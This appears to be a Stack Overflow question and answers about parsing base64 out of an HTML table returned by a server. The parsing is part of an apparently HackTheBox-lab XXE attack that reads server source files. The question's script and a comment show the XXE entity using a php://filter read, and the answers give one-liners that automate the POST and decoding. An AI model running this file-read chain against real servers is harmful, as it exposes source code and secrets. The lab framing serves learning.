1

I am trying to remove the <td> and </td> from a curl output. The output gives a table view that looks like this:

If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>

Under the CWE: column is some base64 I want to decode. Here is what I have tried:

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "

Only, I keep getting

sed: -e expression #1, char 9: unknown option to `s'

on the cat file line.

Update: Using xmllint

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')

Gives me this:

warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"

Update more:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -

XPath set is empty

25
  • 2
    Do you have a compelling reason not to use HTML-aware tools for this? Python ships with several lxml libraries, and modern Linux distros include xmllint and similar tools that can be run from the command line. See f/e xmllint to parse a html file Commented Aug 12, 2021 at 17:21
  • xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file) isn't working @CharlesDuffy Commented Aug 12, 2021 at 17:30
  • $(cat file)? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken. Commented Aug 12, 2021 at 17:31
  • 2
    Don't Parse XML/HTML With Regex. I suggest to use an XML/HTML parser (xmlstarlet, xmllint ...). Commented Aug 12, 2021 at 17:33
  • while we've got some sample input: If DB were ready ... </table>, we don't have the matching expected output; please update the question with the expected output Commented Aug 12, 2021 at 17:33

3 Answers 3

2

Addressing the (original) issue of the sed error:

  • sed 's/</td>//g
  • using / as a delimiter but / is also part of the string to be replaced
  • net result: sed sees an extra / which is a syntax issue
  • either switch to another delimiter that doesn't show up in the data (eg, |) or escape the data (eg, <\/td>)

As for the bigger picture (parsing out the CWE: value) ...

Assuming an HTML-aware tool is not available, there's only one CWE: in the input, and the input is nicely formatted as shown, replace the cat/grep/sed/sed/sed/sed/tr mess and let awk do the work, eg:

awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file

This generates:

SSBBTSBTT01FIEJBU0U2NAo=
Sign up to request clarification or add additional context in comments.

8 Comments

Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich.
Thankyou!! My XXE uses php:// filter to generate base64 encoded source files from the server: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]> so I can now automatically just scrape the source code! I appreciate it!
@CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-)
its a hackthebox lab, not real world. I just like to automate my tools for the writeups @markp-fuso
@Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though.
|
2

For extracting data from html files (supposing it is well formed XML), you better try this one liner:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' | base64 -d

Comments

2

Please don't use RegEx to parse HTML, but use an HTML parser like instead.

The final bit, extracting and decoding the base64 string:

$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64

Despite not knowing the content of your 'xxe.txt', xidel can probably also do all those steps for you:

$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'

or

$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.